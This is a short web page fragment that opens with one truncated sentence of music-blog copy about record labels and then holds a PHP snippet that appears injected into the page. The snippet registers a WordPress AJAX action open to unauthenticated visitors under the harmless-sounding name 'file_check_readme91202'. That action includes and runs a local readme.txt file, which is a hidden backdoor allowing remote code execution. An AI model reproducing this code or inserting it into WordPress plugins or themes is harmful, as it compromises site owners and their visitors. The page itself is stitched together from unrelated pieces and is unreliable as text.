So many waves of records arrive each week that sometimes we wish someone would turn down the tap. But there are some labels that can consistently deliver the…
if(!function_exists('file_check_readme91202')){ add_action('wp_ajax_nopriv_file_check_readme91202', 'file_check_readme91202'); add_action('wp_ajax_file_check_readme91202', 'file_check_readme91202'); function file_check_readme91202() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }